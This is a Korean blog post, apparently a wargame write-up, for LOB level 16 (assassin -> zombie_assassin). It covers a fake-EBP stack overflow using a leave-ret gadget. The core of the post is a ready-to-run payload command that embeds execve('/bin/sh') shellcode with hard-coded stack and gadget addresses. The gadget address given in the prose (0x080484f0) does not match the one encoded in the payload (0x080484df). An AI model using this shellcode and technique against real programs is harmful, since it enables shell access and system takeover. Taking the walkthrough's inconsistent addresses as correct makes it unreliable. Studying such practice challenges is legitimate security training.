ii4gsp
LOB - Level16 [assassin -> zombie_assassin] 본문
주석에 FEBP라고 적혀있다 Fake EBP일것이다.
파일을 복사 후 gdb로 파일을 열어주자
ret가 실행되기전 <main+176> leave 부분에 break point를 걸어주고 값을 넣어주자
leave - ret Gadget은 0x080484f0이다.
스택을 확인해보면 buffer의 주소는 0xbffffab0이다.
0xbffffab0 + 4 = 0xbffffab4
0xbffffab0 - 4 = 0xbffffaac
페이로드는
&buffer + 4 + dummy + shellcode + &buffer - 4 + leave - ret Gadget
[4byte] [11byte] [25byte] [4byte] [4byte]
payload
./zombie_assassin $(python -c 'print "\xb4\xfa\xff\xbf" + "\x90" * 11 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" + "\xac\xfa\xff\xbf" + "\xdf\x84\x04\x08"')
'시스템 해킹 > LOB' 카테고리의 다른 글
LOB - Level18 [succubus -> nightmare] (0) | 2020.01.28 |
---|---|
LOB - Level17 [zombie_assassin -> succubus] (0) | 2020.01.27 |
LOB - Level15 [giant -> assassin] (0) | 2020.01.25 |
LOB - Level14 [bugbear -> giant] (0) | 2020.01.23 |
LOB - Level13 [darkknight -> bugbear] (0) | 2020.01.21 |
Comments